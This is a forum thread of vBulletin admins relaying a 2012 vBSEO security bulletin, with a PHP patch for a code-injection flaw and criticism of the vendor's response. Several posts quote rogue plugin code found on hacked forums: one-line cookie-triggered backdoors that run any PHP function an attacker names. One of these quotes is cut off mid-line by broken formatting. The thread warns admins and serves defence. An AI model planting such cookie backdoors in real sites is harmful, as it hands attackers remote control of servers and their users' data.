*vBSEO Security Bulletin* All Supported Versions: Patch Release

Discussion in 'vBulletin Discussions' started by Brandon, Jan 23, 2012.

  1. Brandon

    Brandon Regular Member

    Joined:
    Jun 1, 2009
    Messages:
    6,602
    Likes Received:
    1,706
    Location:
    Topeka, Kansas
    First Name:
    Brandon
    Dear Customers and Friends,

    An exploit has come to our attention that necessitates the release of a Patch for all currently supported versions, including
    • vBSEO 3.6.0
    • vBSEO 3.5.2
    • vBSEO 3.5.1 (including PL release)
    • vBSEO 3.5.0
    Versions below 3.5.0 are no longer supported and have met end of life. If you are running 3.5.0 or lower, it is highly suggested that you upgrade to a newer build immediately.

    All of the above install packages in the downloads area have been updated should you wish to re-install the entire product. Version numbers have not changed, and there will be no "PL" designation with this update.

    Otherwise, the simple fix is to edit the file
    Code:
    /vbseo/includes/functions_vbseocp_abstract.php
    Find:
    PHP:
    public static function proc_deutf($ptxt$tocharset)
    {
    $ptxt preg_replace('#\'([^\']*)(\'\s*\=\>)#mie''"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')'$ptxt);
    return 
    $ptxt;
    }  
    Replace with:
    PHP:
    public static function proc_deutf($ptxt$tocharset)
    {
    $ptxt preg_replace('#\'([^\']*)(\'\s*\=\>)#mie''"\'".(($_s =  iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s :  \'$1\').stripslashes(\'$2\')'$ptxt);
    return 
    $ptxt;
    }  
    Please take immediate action to protect your sites.

    IMPORTANT
    It has been reported that some sites have had random plugins show up in their plugin list in the vB adminCP. Please take the time to go through your plugin list. If you do see anything that doesn't look familiar, it may be wise to disable that plugin while troubleshooting further. Most reports have been tied to the global_complete hook under the core 'vBulletin' product, but may also be elsewhere. We are unsure of any implications or ramifications that may have resulted, as an infinite of code or text may have been injected. However, what we have seen appears to be a link-stealer for outbound traffic and doesn't necessarily expose any information or passwords of your site. It is always a good idea to update your ftp, server, vb admin, vbseocp, and even any htaccess passwords on your server as a precaution.

    If you find any more information about the issue, please do bring it to our attention ASAP so it can be addressed.

    If you have any questions, please feel free to open up a ticket or thread and we will be glad to assist further.

    Thank you,

    The vBSEO Team
    http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/



    Also it looks like a rouge plugin has been popping up a lot
    Remove this if you have it!
    vbCMS Global Thread Cache
    PHP:
    /* vBCMS Global Thread Cache */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);  
     
  2. Cerberus

    Cerberus Admin Talk Staff

    Joined:
    May 3, 2009
    Messages:
    1,031
    Likes Received:
    500
    Thanks for the heads up :)
     
    Brandon likes this.
  3. Brandon

    Brandon Regular Member

    Joined:
    Jun 1, 2009
    Messages:
    6,602
    Likes Received:
    1,706
    Location:
    Topeka, Kansas
    First Name:
    Brandon
    It looks like there are several bad plugins floating around...

    Like the one above but with this code.

    vBulletin Templates Cookie Caching
    PHP:
    /* vBulletin Templates Cookie Caching */
    $vbr="ujhdfgyj";$vbh="6a234a2a6b89b531b6720b9f86f42d7f";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&[/php
     
    also
     
    [php]/* vBCMS Global Thread Cache */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20)
    and

    PHP:
    /* vBulletin Dynamic Menu Filters */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
    all these plugins should be removed IMHO if you see them listed
     
  4. Brandon

    Brandon Regular Member

    Joined:
    Jun 1, 2009
    Messages:
    6,602
    Likes Received:
    1,706
    Location:
    Topeka, Kansas
    First Name:
    Brandon
    Here is a great post with some disturbing info about vbseo..


    In the first few days of January, I found a plugin and a file I didn't recognize (it was one folder that I'd left write access on because SQLite was behaving odd and it was outside of the forum directory).

    I thought it was something related to an exploited SSO script for a company I won't name.

    Obviously that wasn't the case.

    I love vbSEO in so many ways and have been using it for 4 years. I've been using it since early 2007 (under a different business) and credit it with the growth of two forums I've run, one of which I sold. I've been using vBulletin since 2000 and always wanted it to have a high-quality mod for rewriting URLs to match the rest of the review site I'd coded myself (not the current site I used it on).


    Over at vBulletin.com...

    kau runs a business that hosts vBSEO and non-vBSEO vBulletin forums:
    Jafo said that he notified you of this exploit over a year ago:


    It's one thing if you are a single mod maker who offers a vB Product/Plugin for free, donation or a low price, but you advertise yourself as a company for high traffic sites.


    Your response as of now is unacceptable for the type of company you claim to be.

    Your company advertises itself as...
    Our mental health forum does 600k uniques and 5 million pageviews a month (Google Analytics) and is of a sensitive nature. Now, I have to tell our users to clear their caches/cookies. Many will be understandably paranoid and concerned.


    Now, I'm not naive. Of course things like this happen, but the important thing is how you choose to respond.

    Don't hand this off to vBulletin when plugin names like "vBCMS Global Thread Cache" are popping up all over as a result of the vBSEO exploit.




    Take responsibility:
    1. Create a list of all the plugins/products (including the name and code) and other malicious files (for those that have writable directories) that are reported to you or you find yourself.
    2. Figure out exactly what the plugin/product/file exploits are doing yourself, with vBulletin or hire a security expert to figure it out.
    3. Tell people in a clear blog/forum post exactly what happened (you had fixed the exploit and then it got back into the code, right?), why it happened, why it won't happen again and what steps they need to take to find out how/if the expoit was used, how to remove the plugins/products, and how best to explain to their users (e.g. both the use of vBulletin's dismissible notices for logged in users and the wording of the Notice).
    Don't be like so many software, security and financial companies are. Instead, look at how LastPass responded to a *potential* breach. They didn't have to mention it because as far as they could tell, nothing had been compromised, but they chose to do the right thing and provided detailed instructions to their customers on what happened and how to act. Now you can even use Google Authenticator for two step verificationwith LastPass.

    Obviously, vBSEO's security isn't as critical as LastPass, but it doesn't mean you can't learn from them and do the right thing.

    .... I see the thread is now closed :(
     
    cpvr likes this.
  5. Brandon

    Brandon Regular Member

    Joined:
    Jun 1, 2009
    Messages:
    6,602
    Likes Received:
    1,706
    Location:
    Topeka, Kansas
    First Name:
    Brandon
    a post from Juan, the owner...

    Check out the post, there is more info as well as a tool to check your sites.
     
  6. AWS

    AWS Administrator

    Joined:
    Feb 1, 2010
    Messages:
    1,612
    Likes Received:
    695
    Location:
    Joliet, IL U.S.A.
    First Name:
    Bob
    Just an FYI. If you were affected by this you will want to do some serious checking that your server doesn't have any backdoors installed. The plugin code is used to inject a stealth shell. Once the hacker runs it on your server he can do any number of bad things. It is a variant of a proof of concept that was created to show how easy it is to use cookies to inject a payload on a server. The interesting thing is it only takes one line of code.
     
    Brandon likes this.

Share This Page